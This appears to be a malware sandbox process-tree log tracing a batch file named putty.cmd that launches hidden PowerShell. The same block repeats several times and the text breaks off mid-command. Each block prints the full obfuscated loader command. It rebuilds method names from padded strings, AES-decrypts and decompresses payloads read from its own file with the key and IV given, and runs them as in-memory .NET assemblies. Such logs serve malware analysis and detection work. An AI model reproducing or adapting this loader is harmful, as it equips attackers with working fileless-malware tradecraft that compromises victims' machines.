C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function 